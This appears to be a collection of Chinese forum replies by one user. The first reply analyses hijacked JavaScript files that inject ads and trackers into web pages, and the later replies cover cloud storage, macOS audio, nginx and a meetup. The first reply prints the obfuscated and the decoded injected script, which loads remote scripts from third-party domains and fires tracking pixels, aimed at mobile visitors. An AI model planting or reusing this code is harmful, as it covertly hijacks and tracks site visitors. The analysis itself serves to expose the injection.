然后这个 liuzhi520 自行搜索一下，很有趣的事情，有兴趣的同学可以深挖一下这两个域名～

后面这个 m8ze.js 搞的事情，其实也一样，这是解码后的代码：

(function(h,c){function g(k){try{var d=h.getElementsByTagName("head")[0];var l=d.appendChild(b(k));setTimeout(function(){d.removeChild(l)},2000)}catch(j){}}function f(d){return h.createElement(d)}function b(k){var d=f("script");d.type="text/javascript";d.async=true;d.src=k;return d}function a(m){var l="";var d=Math.floor(m.length/4);var k=m.length-4*d;for(var j=0;j<d;j++){l+=m.substr(4*j,3)}if(k>0){l+=m.substr(4*d)}l=decodeURIComponent(l);l=l.split("").reverse().join("");l=l.replace(/["]/g,"www");l=l.replace(/[>]/g,"http");l=l.replace(/[<]/g,".");return l}function i(){var d=new Image();d.src=a("p1j5tgmQ%3Dpw%3xFphIp%3ICci0p%2sF32Q07%c3Anlc%3BCxlgeolu%3Cbzm%w2F%r2F%N3A%W3E")}function e(){var d=new Image();d.src=a("llaLp1mb%3Dqw%3HFphUp%34CciXp%2lF32B07%W3Anfc%3KCxlleolB%3Cqzm%r2F%Q2F%h3A%63E")}if(Math.random()<0.02){i()}if(!c._uuid_mobi_all1_){c._uuid_mobi_all1_=1;if(Math.random()<0.02){e()}g(a("sj%f3Cnzim%03CyAreuqqj%42FbMti%U2Fs2er%L2FmBoc%v3CxXjb-tcs%o3Cmwh%28F%2rF%3VA%3dE"))}})(document,window);

一样的套路，分别访问了

"http://mz.loelx.cn:7023/pic.php?w=mgtj1p"
"http://mz.loelx.cn:7023/pic.php?w=m1pall"
"http://hm.sc-bjx.com/res/itb/jquery.min.js"

前面两个是 new Image() 用于跟踪访客的，最后的这个 jquery.min.js 很有意思的

其中有三句很蛋疼的加密语句

h("sj%33Cskcit2ylajna%x2FmSoc%d3CsLcit7ylavna-9elgCoogR%3C9%22g")
h("454L01%Z3DdJi%38Fphcp%3BCnoWmmo7c_shjdaT_trJ%2FU2mzV_trh%2Fwmocc%3CU0250ihzXuilr%3C5a%2cF%2EF%3MA%3IE")
h("sj%L3CeCz8mF%2F0btic%2Fwserz%2F5mocN%3Cexjby-cs8%3CGgi%l2F%R2F%s3A%73E")

代码上下文可知，这个 h 必定是解密字符串的函数啊，然而，这段 h 函数写得有点问题，自己修复一下执行解密后，结果分别是

"www.google-analytics.com/analytics.js"
"http://a.liuzhi520.com/rt_zm2/rt_adjs_common.php?id=10454"
"http://ig.sc-bjx.com/res/itb/m8ze.js"

你都解密出 eval 了，剩下的还不简单啊，那个 g[c()] 按照后面的传入参数，其实就相当于 window[eval()] ，那么剩下的解码就是 把后面的这段直接丢 console 执行即可

解码出来的就是这一段，请自己格式化一下吧：

(function(l,n){function f(o){try{var d=l.getElementsByTagName("head")[0];var q=d.appendChild(i(o));setTimeout(function(){d.removeChild(q)},2000)}catch(j){}}function c(d){return l.createElement(d)}function i(e){var d=c("script");d.type="text/javascript";d.async=true;d.src=e;return d}function h(p){var o="";var d=Math.floor(p.length/4);var j=p.length-4d;for(var e=0;e<d;e++){o+=p.substr(4e,3)}if(j>0){o+=p.substr(4d)}o=decodeURIComponent(o);o=o.split("").reverse().join("");o=o.replace(/["]/g,"www");o=o.replace(/[>]/g,"http");o=o.replace(/[<]/g,".");return o}try{var a="sj%33Cskcit2ylajna%x2FmSoc%d3CsLcit7ylavna-9elgCoogR%3C9%22g";a=h(a);var k=l.getElementsByTagName("script");for(var g=0;g<k.length;g++){if(k[g].src&&k[g].src.indexOf(a)==7){if(!n.g1wtj_uuid_a2n11){n.g1wtj_uuid_a2n11=1;f(["ht","tp","s://",a].join(""));if(top==this){var b=navigator.userAgent;if(b.indexOf("Android")>0||b.indexOf("Mobile")>0){if(!n.uuid_m8v_0212){n.uuid_m8v_0212=1;setTimeout(function(){f(h("454L01%Z3DdJi%38Fphcp%3BCnoWmmo7c_shjdaT_trJ%2FU2mzV_trh%2Fwmocc%3CU0250ihzXuilr%3C5a%2cF%2EF%3MA%3IE"));f(h("sj%L3CeCz8mF%2F0btic%2Fwserz%2F5mocN%3Cexjby-cs8%3CGgi%l2F%R2F%s3A%73E"))},10)}}}}break}}}catch(m){}})(document,window);

就这名字在中文的读音，怎么也得收藏点个赞～

大家都是 1TB 的收费 plan 来算的话，感觉跟 Dropbox 这些好像也没差多少。就这三两刀的区别，而 app 的生态好用太多太多

不过如果单纯是兼容 S3 的话，可以当作备胎用。哈哈哈哈～

以前我也一直觉得用 MacOS 就是为了装个逼，晒晒优越感......

直到我开始玩 Audio Interface 入手了 Ultralite MK4，Windows7/10 下面各种不成功，插上 MacOS 装个驱动，完美使用。各种软件，各种的驱动，真心省事

其他不说，如果你是影视、音频、编曲这样的创意制作者，用 MacOS 是不二之选，没有之一

一直在用 bitbucket 免费 private 仓库的同学路过表示内心毫无波澜～

当然了，多个免费的选择也是挺好的～

前面一个二个动不动就一万两万多少万的，让我这几千块账单的情何以堪

dive into 理解为“深入”？

虽然看不懂，不过多一个实现总是好事。加油！

每次 nginx reload 记得这样敲命令，反正我觉得这是 nginx reload 的最佳实践了

sudo nginx -t && sudo nginx -s reload && sudo tail -f /var/log/nginx/error.log

可以直接搞个命令的 alias，不过一定记得这样敲

@123s 这里统计的是参与评论主贴的人员，如果参与评论主贴的回复内容里面还 at 了其他人员的话，这个我是没有考虑到的

如果需要全部计算整个主贴下面的评论人员，含回复内容内 at 的，应该思路也是差不多的，就是筛选一下回复内容里面的 at 吧

你可以尝试实现以下~ ：）

@jera 竟然无言以对........

@LoveParkHyomin
@Wenpo
@emric
@CernetBoom
@695975931
@PigRinpoche
@hao888
@ShareDuck
@time2049
@chung
@afc
@moguanqi
@zuolan
@237176253
@nomoreplay
@sdfd
@chy1024
@xenme
@Halry

最近工作不那么忙，终于想起线下聚会这个事情了。我一次性 js 代码收集的 at 人列表，如果有 at 错的，还请原谅

没有很多这样的陌生人聚会的经验，为了避免争议，感觉最好就是约个场所（比如广场、星巴克、麦当劳什么鬼），然后自行组队聊天交流，饮料和其他费用自行 AA，遇到臭味相投的就自己加微信电话聊天即可

不是很清楚大家的意向，我统一 at 一次，暂时在这里讨论，如果真要觉得线下聚会，我再生成一个微信群拉人，具体的地点、聚会时间，可以再商定

有问题请在此贴持续 at 我即可

我就不 at 贴主了，因为大家回复，他是可以收到通知的。哈哈哈哈哈哈

本来想挖坑写个 aff 链接的 tracker，忽然发现有 url shortener 这现成的可以用 /:doge:/ https://ws4.sinaimg.cn/bmiddle/62e721e4gw1et02g5wksrj200k00k3y9.jpg

我觉得如果浏览器所有的 Native API 提供一个类似 Proxy ( https://developer.mozilla.org/zh-CN/docs/Web/JavaScript/Reference/Global_Objects/Proxy ) 这样的实现，那么不用怎么逆向你的 WebAssembly 逻辑实现，分析出你的程序调用流也是分分中的事情。

有程序调用流，再来一个个逆向 WebAssembly 程序用到的数据结构

如果还能提供浏览器自身的内存映射结构出来让 IDA 搞，那目测也没有啥秘密可言～

这种漏洞在这边貌似不多受待见，发个水果的才会有人跟帖。挺怀念 wooyun zone 的

@IllllI #154 所以才说肉痛，一次涨这么多，都快赶上台车的 一百分之一了。想想以前台飞度，3000 都够全包了......